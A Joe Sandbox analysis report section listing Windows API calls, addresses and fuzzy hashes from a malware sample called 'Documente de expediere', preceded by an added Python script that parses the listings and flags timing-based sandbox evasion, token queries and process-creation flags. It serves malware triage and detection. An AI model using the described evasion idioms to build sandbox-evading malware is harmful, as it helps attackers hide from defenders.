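The per-function API listings in this section are regular enough to triage mechanically rather than by eye: the QueryPerformanceCounter/Sleep/QueryPerformanceCounter/Sleep sequence at 006F166F-006F16D1 is the pattern the report's "execution timing" signature refers to, the CreateProcessW call at 0071B93C carries its dwCreationFlags argument inline (00000020), and the OpenThreadToken/OpenProcessToken pair at 006E8C6A-006E8C7E is a process querying its own token. The Python below is an added example for this page, not Joe Sandbox code and not code from the analysed sample. It parses entries in the text layout used here into call sequences (keeping "Part of subcall function" lines apart from direct calls), applies three pattern rules of its own, and decodes the creation flags to answer the question a practitioner asks first: was the child created suspended, as injection would need? The rules, the flag-name table and the four-entry input excerpt are the example's own assumptions; the excerpt is copied from this section and cut down to the API and fuzzy-hash lines.

```python
"""Parse Joe Sandbox per-function API listings into call sequences and flag a few
anti-analysis idioms. Added example for this page; not Joe Sandbox code and not
code from the analysed sample."""
import re
from dataclasses import dataclass, field

# Constructed input: four entries from this report section, cut down to their API
# lines and the "Instruction Fuzzy Hash" line that ends each function entry.
# Other report lines (Memory Dump Source, Similarity, ...) are simply ignored.
SAMPLE = """\
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,006F01FD,?,006F1250,?,00008000), ref: 006F166F
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,006F01FD,?,006F1250,?,00008000), ref: 006F1694
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,006F01FD,?,006F1250,?,00008000), ref: 006F169E
• Sleep.KERNEL32(?,?,?,?,?,?,?,006F01FD,?,006F1250,?,00008000), ref: 006F16D1
• Instruction Fuzzy Hash: AC115231D0051DE7CF009FA5D944AFEBF79FF0A791F158159DA40FA240CB3455509B9A
• _memset.LIBCMT ref: 0071B8FE
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00757F20,00757F64), ref: 0071B93C
• CloseHandle.KERNEL32 ref: 0071B94E
• Instruction Fuzzy Hash: 74F05EF2644310BBE210AB65BC06FFB3A5DEB08355F008031FA09D52E2D7BA5901C7AC
• GetCurrentThread.KERNEL32 ref: 006E8C63
• OpenThreadToken.ADVAPI32(00000000,?,?,?,006E882E), ref: 006E8C6A
• GetCurrentProcess.KERNEL32(00000028,?,?,?,?,006E882E), ref: 006E8C77
• OpenProcessToken.ADVAPI32(00000000,?,?,?,006E882E), ref: 006E8C7E
• Instruction Fuzzy Hash: F8E04F366423119FD7205FB56E0CBD63BA8AF55B92F15C828E649CA090DA3894418B65
  • Part of subcall function 00692612: GetWindowLongW.USER32(?,000000EB), ref: 00692623
• DefDlgProcW.USER32(?,00000020,?), ref: 006912D8
• Instruction Fuzzy Hash: A2112B3550001AABCF00EFA8D8859FE77BEEB06301F5044A5F901EB651C734BA918BA9
"""

# One call line: optional "Part of subcall function XXXX:", then Api.MODULE(args), ref: addr
API_RE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$")
HASH_RE = re.compile(r"^\s*•\s*Instruction Fuzzy Hash:\s*(?P<h>[0-9A-F]+)")

@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int        # call-site address as printed in the report
    subcall: bool   # reached through a callee, not made directly by this function

@dataclass
class FunctionEntry:
    calls: list = field(default_factory=list)
    fuzzy_hash: str = ""

def parse_entries(text):
    """Split report text into FunctionEntry objects; the fuzzy hash ends an entry."""
    entries, cur = [], FunctionEntry()
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            raw = m.group("args")
            args = [a.strip() for a in raw.split(",")] if raw else []
            cur.calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                                     int(m.group("ref"), 16), bool(m.group("sub"))))
            continue
        m = HASH_RE.match(line)
        if m:
            cur.fuzzy_hash = m.group("h")
            entries.append(cur)
            cur = FunctionEntry()
    return entries

def in_order(names, *wanted):
    """True if every name in `wanted` occurs in `names` in that order (gaps allowed)."""
    it = iter(names)
    return all(any(n == w for n in it) for w in wanted)

# dwCreationFlags bits (assumed subset, values as documented for Win32 CreateProcess)
CREATE_SUSPENDED = 0x4
CREATION_FLAGS = {0x4: "CREATE_SUSPENDED", 0x8: "DETACHED_PROCESS", 0x10: "CREATE_NEW_CONSOLE",
                  0x20: "NORMAL_PRIORITY_CLASS", 0x08000000: "CREATE_NO_WINDOW"}

def triage(entry):
    """Pattern rules (the example's own, not Joe Sandbox signatures) over one entry."""
    direct = [c.api for c in entry.calls if not c.subcall]
    out = {
        # QPC .. Sleep .. QPC measures how long Sleep really took: a timing check
        # against debuggers and sandboxes that single-step or fast-forward sleeps
        "timing_check": in_order(direct, "QueryPerformanceCounter", "Sleep",
                                 "QueryPerformanceCounter"),
        "token_inspection": {"OpenThreadToken", "OpenProcessToken"} <= set(direct),
        "create_process": [],
    }
    for c in entry.calls:
        # CreateProcessW/A: dwCreationFlags is the 6th argument (index 5)
        if c.api in ("CreateProcessW", "CreateProcessA") and len(c.args) > 5 and c.args[5] != "?":
            flags = int(c.args[5], 16)
            out["create_process"].append({
                "flags": flags,
                "named": [n for bit, n in sorted(CREATION_FLAGS.items()) if flags & bit],
                "suspended": bool(flags & CREATE_SUSPENDED)})
    return out

if __name__ == "__main__":
    for e in parse_entries(SAMPLE):
        print(e.fuzzy_hash[:16], [c.api for c in e.calls], triage(e))
```

Run as a script it prints one line per function with its call sequence and findings; on the excerpt the CreateProcessW call decodes to flags 0x20 (NORMAL_PRIORITY_CLASS only, not suspended), so this particular function is a plain child launch and the injection the report describes elsewhere has to come from other code paths. Subcall lines are parsed but excluded from the sequence rules so that an API reached through a shared helper does not make every caller look like a timing check.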
                                                APIs
                                                • GetDesktopWindow.USER32 ref: 006D2187
                                                • GetDC.USER32(00000000), ref: 006D2191
                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 006D21B1
                                                • ReleaseDC.USER32(?), ref: 006D21D2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                • String ID:
                                                • API String ID: 2889604237-0
                                                • Opcode ID: 659eec6fbcf988ea7bcd26654ab3bd5d75f31da23c1c3407c0811b6e81350bcc
                                                • Instruction ID: c949bd268189a3b5b39974a3709b11e65e328fc9210a588cc2e9613919395c18
                                                • Opcode Fuzzy Hash: 659eec6fbcf988ea7bcd26654ab3bd5d75f31da23c1c3407c0811b6e81350bcc
                                                • Instruction Fuzzy Hash: BBE01A75800204EFDF019FA8CC08ADD7BF6EB5C350F11C42AF95A972A0CB3881429F49
                                                APIs
                                                • GetDesktopWindow.USER32 ref: 006D219B
                                                • GetDC.USER32(00000000), ref: 006D21A5
                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 006D21B1
                                                • ReleaseDC.USER32(?), ref: 006D21D2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                • String ID:
                                                • API String ID: 2889604237-0
                                                • Opcode ID: 63229a29e2a81ee611745ba06e058d93603c3845b4485971a88fa1e9c9102748
                                                • Instruction ID: e6c475e29c75726cd00a057012da350ec933339166af5787fcbc05fede3afd6d
                                                • Opcode Fuzzy Hash: 63229a29e2a81ee611745ba06e058d93603c3845b4485971a88fa1e9c9102748
                                                • Instruction Fuzzy Hash: 44E0EEB5800204AFCF01AFA8C80869D7BB6EB4C360F11C029F95AA72A0CB3891429F48
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: %r
                                                • API String ID: 0-2999538795
                                                • Opcode ID: 0805423f0d59dbafd4ed1a7ae80c9d134ba28ffb2ce90554f52cad143bb66f7e
                                                • Instruction ID: 6f9c018a34fed3c6a4dcdace3cb5d67f94e258b5671f0e0e26b5a899e091f229
                                                • Opcode Fuzzy Hash: 0805423f0d59dbafd4ed1a7ae80c9d134ba28ffb2ce90554f52cad143bb66f7e
                                                • Instruction Fuzzy Hash: BAB1A1719002099BCF14EF98C4819FEB7BEFF44310F50812AF902A7A95DB359E86CB65
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: __itow_s
                                                • String ID: xru$xru
                                                • API String ID: 3653519197-2112298241
                                                • Opcode ID: 86c2cda687b7fad5def6396454a43804652e7205ebb8a1885a47fc6ef631c914
                                                • Instruction ID: 48c5604472903c2e0260573637442726f99e33c1c92ccd872c86f92b0ceff7a6
                                                • Opcode Fuzzy Hash: 86c2cda687b7fad5def6396454a43804652e7205ebb8a1885a47fc6ef631c914
                                                • Instruction Fuzzy Hash: D0B16D70A00209EFCB14DF54C880EAEB7FAFF58300F148659F9459B292EB75EA41CB64
                                                APIs
                                                  • Part of subcall function 006AFEC6: _wcscpy.LIBCMT ref: 006AFEE9
                                                  • Part of subcall function 00699997: __itow.LIBCMT ref: 006999C2
                                                  • Part of subcall function 00699997: __swprintf.LIBCMT ref: 00699A0C
                                                • __wcsnicmp.LIBCMT ref: 006FB298
                                                • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 006FB361
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                • String ID: LPT
                                                • API String ID: 3222508074-1350329615
                                                • Opcode ID: 7cc4c502d1d0edb94e66a73adce204a00d5b854ca527f23d1104c5fcd13c2df5
                                                • Instruction ID: e0a83c7d87e3159a451f4313ccf052950affb1b3710830a1321750eb9d7d05f5
                                                • Opcode Fuzzy Hash: 7cc4c502d1d0edb94e66a73adce204a00d5b854ca527f23d1104c5fcd13c2df5
                                                • Instruction Fuzzy Hash: 0E616176A00219AFCB14EB98C881EFEB7BAAF08310F15505DF546AB391DB70AE41CB55
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: Oaj
                                                • API String ID: 4104443479-1426506063
                                                • Opcode ID: e25d1d63914e36d6523bcbe38dae89e4fe877d3bb12b76798303c8d92ec3af8b
                                                • Instruction ID: 3fcf890b70298ed304ef1b5721bbca2c87fedd3d141c8a0080148951f138f1c0
                                                • Opcode Fuzzy Hash: e25d1d63914e36d6523bcbe38dae89e4fe877d3bb12b76798303c8d92ec3af8b
                                                • Instruction Fuzzy Hash: B2515DB0E006199FDB64DF68C884AEEB7B2FF45304F14852AE85AD7340EB31A955CB51
                                                APIs
                                                • Sleep.KERNEL32(00000000), ref: 006A2AC8
                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 006A2AE1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: GlobalMemorySleepStatus
                                                • String ID: @
                                                • API String ID: 2783356886-2766056989
                                                • Opcode ID: 31a08223093864b7b03acddeae44fdede1f5e221924ae7a76849dfd0a8525dcf
                                                • Instruction ID: 34cde37dc15619052a2a75b3d4f7bf0b4581bb7ecdc1cb942764e7f5a123a421
                                                • Opcode Fuzzy Hash: 31a08223093864b7b03acddeae44fdede1f5e221924ae7a76849dfd0a8525dcf
                                                • Instruction Fuzzy Hash: E65157714187449BE360AF14D886BAFBBFCFF84310F42885DF1E9411A1EB349529CB2A
                                                APIs
                                                  • Part of subcall function 0069506B: __fread_nolock.LIBCMT ref: 00695089
                                                • _wcscmp.LIBCMT ref: 006F9AAE
                                                • _wcscmp.LIBCMT ref: 006F9AC1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _wcscmp$__fread_nolock
                                                • String ID: FILE
                                                • API String ID: 4029003684-3121273764
                                                • Opcode ID: b02b7c822275a89291731221cf260463b46d2cc4e2c0d33317f456b53e39dab2
                                                • Instruction ID: b65b348dd45e78a28326efd398252b42121acd1bd11641a7a107a2db9e019aa9
                                                • Opcode Fuzzy Hash: b02b7c822275a89291731221cf260463b46d2cc4e2c0d33317f456b53e39dab2
                                                • Instruction Fuzzy Hash: A341D6B1A00619BADF219AA0DC45FEFB7BEDF45710F00007DBA01A7281DA759A4587A5
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ClearVariant
                                                • String ID: Dtu$Dtu
                                                • API String ID: 1473721057-3210119752
                                                • Opcode ID: 23c1456607ad53ecbc3556452efe5f757ec78be6bdac68c715a6faf17bcb2aec
                                                • Instruction ID: f7b704b3de456003995eb882558380dba0ab52373af750e221f476e1618ca79e
                                                • Opcode Fuzzy Hash: 23c1456607ad53ecbc3556452efe5f757ec78be6bdac68c715a6faf17bcb2aec
                                                • Instruction Fuzzy Hash: 21510674A08341CFDB54CF59C080A6ABBF6BB99344F54885DF8858B721D772EC81CB82
                                                APIs
                                                • _memset.LIBCMT ref: 00702892
                                                • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 007028C8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: CrackInternet_memset
                                                • String ID: |
                                                • API String ID: 1413715105-2343686810
                                                • Opcode ID: 108f15285473c3ee2635f180fda927a2b9170ae0dcdb4f47247f3017fb415cee
                                                • Instruction ID: 4bb9fb8f8625c16b0f08b853172b2a15917e9bd4f0b9eb27f92b038122d0f44e
                                                • Opcode Fuzzy Hash: 108f15285473c3ee2635f180fda927a2b9170ae0dcdb4f47247f3017fb415cee
                                                • Instruction Fuzzy Hash: E2314A71810119AFCF45EFA1CC89EEEBFB9FF08310F004129F815A61A6DB355A56DBA4
                                                APIs
                                                • DestroyWindow.USER32(?,?,?,?), ref: 00716D86
                                                • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00716DC2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Window$DestroyMove
                                                • String ID: static
                                                • API String ID: 2139405536-2160076837
                                                • Opcode ID: 3438f95f047b8d6bebe2f7b1a927be0027123fe08fdcc28b534c9749bbbf8396
                                                • Instruction ID: fd46f9fda1f11b379070353744bd061b219afebf89fd4fe864c68db5b26deefe
                                                • Opcode Fuzzy Hash: 3438f95f047b8d6bebe2f7b1a927be0027123fe08fdcc28b534c9749bbbf8396
                                                • Instruction Fuzzy Hash: B3319C71200604AEDF109F38DC81AFB77ADFF48720F10861DF8A997190DA39AC91CB64
                                                APIs
                                                • _memset.LIBCMT ref: 006F2E00
                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 006F2E3B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: InfoItemMenu_memset
                                                • String ID: 0
                                                • API String ID: 2223754486-4108050209
                                                • Opcode ID: 3fd8545e350d7c3c3a761b147f4f9ec7cb02fb795fc31af8880422679badfe66
                                                • Instruction ID: f5cf89d0f16b46efa224a872a880d6f7b4bf18ce10bc5d56975d44c6a7fdbe03
                                                • Opcode Fuzzy Hash: 3fd8545e350d7c3c3a761b147f4f9ec7cb02fb795fc31af8880422679badfe66
                                                • Instruction Fuzzy Hash: 0031C57160030EABEB248F58C9957FEBBBBEF05350F24402EEA85962A1E7749944CF54
                                                APIs
                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 007169D0
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007169DB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: Combobox
                                                • API String ID: 3850602802-2096851135
                                                • Opcode ID: 2d4abdb773defc9e2b02b47c855a8be9ce1054ed2d04c27e521d09230c730fa6
                                                • Instruction ID: c33f8063a704384daa53b17f5fbd21cd4a8b6279f3ea51cad4ffe8f965d35d21
                                                • Opcode Fuzzy Hash: 2d4abdb773defc9e2b02b47c855a8be9ce1054ed2d04c27e521d09230c730fa6
                                                • Instruction Fuzzy Hash: DF1198717002096FEF119F18CC91EFB3B6EEB993A4F114129F9589B2D0D679EC9187A0
                                                APIs
                                                  • Part of subcall function 00691D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00691D73
                                                  • Part of subcall function 00691D35: GetStockObject.GDI32(00000011), ref: 00691D87
                                                  • Part of subcall function 00691D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00691D91
                                                • GetWindowRect.USER32(00000000,?), ref: 00716EE0
                                                • GetSysColor.USER32(00000012), ref: 00716EFA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                • String ID: static
                                                • API String ID: 1983116058-2160076837
                                                • Opcode ID: eda383d078d8abce99a0718bf49b528bb6e965102ab951e5fde5ea62f003b2df
                                                • Instruction ID: 330ba75720b93d4db4a92bdee87a165504a46fee09b3e396caa48dcd7baa16bf
                                                • Opcode Fuzzy Hash: eda383d078d8abce99a0718bf49b528bb6e965102ab951e5fde5ea62f003b2df
                                                • Instruction Fuzzy Hash: A921297261021AAFDB04DFA8DD45AEA7BB9FB08314F044629F955D3290E638E8A19B50
                                                APIs
                                                • GetWindowTextLengthW.USER32(00000000), ref: 00716C11
                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00716C20
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: LengthMessageSendTextWindow
                                                • String ID: edit
                                                • API String ID: 2978978980-2167791130
                                                • Opcode ID: 39744fb2d0dac6c65be7c1e26db7301a57d22ff520070d60cdd7a4ec53857931
                                                • Instruction ID: 049c287e80a37ada2bf1a4e59772f1f015990c0fe30c79b0a676e211654654e6
                                                • Opcode Fuzzy Hash: 39744fb2d0dac6c65be7c1e26db7301a57d22ff520070d60cdd7a4ec53857931
                                                • Instruction Fuzzy Hash: 12119AB1104208ABEB208E689C41AEB376AEB05368F608724F960D71E0C679EC919B60
                                                APIs
                                                • _memset.LIBCMT ref: 006F2F11
                                                • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 006F2F30
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: InfoItemMenu_memset
                                                • String ID: 0
                                                • API String ID: 2223754486-4108050209
